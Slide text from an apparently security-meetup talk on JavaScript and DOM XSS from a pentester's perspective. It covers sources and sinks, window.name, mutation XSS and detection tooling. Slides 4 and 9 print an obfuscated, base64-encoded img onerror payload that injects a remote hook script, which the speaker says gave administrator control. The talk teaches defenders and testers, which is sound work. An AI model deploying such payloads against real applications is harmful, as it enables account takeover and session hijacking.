http://www.meetup.com/Null-Singapore-The-Open-Security-Community/events/227205402/

1. JavaScript Security –
Pentesters perspective
Prasanna Kanagasabai

2. Introduction
Prasanna Kanagasabai (PK)
Working for ThoughtWorks
Pentester for close to a decade
Speaker @ null Delhi, Clubhack Pune, Devops Days
Singapore …
null Singapore moderator

3. Agenda
Dom XSS
Sources & Sinks
Some very interesting Issues
Automation in Detection

4. <img src=a
onerror='eval2=eval;eval2(atob("eCA9IGRvY3Vt
ZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lK
Cdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZG9j
dW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0
JykpOyB4LnNyYz0naHR0cDovLzEyNy4wLjAu
MTozMjAwL2hvb2suanMn"))’>.JPG
I used the above exploit to become admin on a application. ….

5. Dom XSS
A bit different kind of XSS
Attacker Payload makes change in the DOM. The
payload does not have to go to server.
The application monitoring solutions may not even
know about the issue.
Hello World in Dom XSS :
<script>
var name= document.location.hash.slice(1)
document.write(name)
</script>

6. Sources and Sinks
Source : Entry Point for untrusted data
Sink : Sink is when the untrusted data is used to
change the DOM
Fundamental problem : Data (“string”) ! Code

7. Sources & Sinks
location
location.href
location.search
location.hash
window.name
document.cookie
Etc …..
Eval
Settimeout
Function(X)()
Document.write
Document.writeln
innerHTML
outerHTML
Etc ….
https://code.google.com/p/domxsswiki/wiki/Sources
https://code.google.com/p/domxsswiki/wiki/Sinks

8. File Upload XSS
A dom XSS was found in Authenticated Section of the
Application
The Uploaded file was Changing the DOM
This was given a Low Priority bug
Reasons :
The bug is available only in the authenticated section so
only users can hack them selves.
Filenames cannot have special characters so cannot
weaponize this attack.

9. File upload XSS
<img src=a
onerror='eval2=eval;eval2(atob("eCA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnl
UYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3Jl
YXRlRWxlbWVudCgnc2NyaXB0JykpOyB4LnNyYz0naHR0cDovLzEyNy4wLjA
uMTozMjAwL2hvb2suanMn"))’>.JPG – This lead to controlling
administrator.
Application allowed power users to upload files from a
USB
JavaScript functions solved the special character problem.
Understood a unique behavior of eval()

10. Window.name
Gets/sets the name of the window.
Cross Domain Exploit
Any Sink using the tainted property can now create
DOM XSS
Yahoo Dom XSS !https://www.exploit-db.com/docs/
24109.pdf
Can be used to set global variables ! Control flow

11. Malicious Redirect
Using _blank
Cross Domain
Hacker one had written about their experience with
this attack ! https://hackerone.com/reports/23386

12. JavaScript Template Engines
Data : Could be JSON
Template Engine pattern
The input is filtered and the template engine could
replace the pattern with filtered content.
Filters don’t know less prevalent bypass like Mutation
XSS
Credits : Mario Heiderich, Nafeez ahmed
https://cure53.de/fp170.pdf

13. Mutation XSS
ECMAscript String.replace is the problem
When $+”Backtick” is used it returrns the string that
precedes the matched string
Allows us to recreate a new image tag. All we need to
do the attributes.
https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/
String/replace

14. How Do we Automate
Attack surface is large
The JS is compressed ugliefied
Manual verification could take time.
Flow identification is easier.
Solution : Hookish https://github.com/skepticfx/hookish

15. That’s All folks
Thank You !!
Email: pk@null.co.in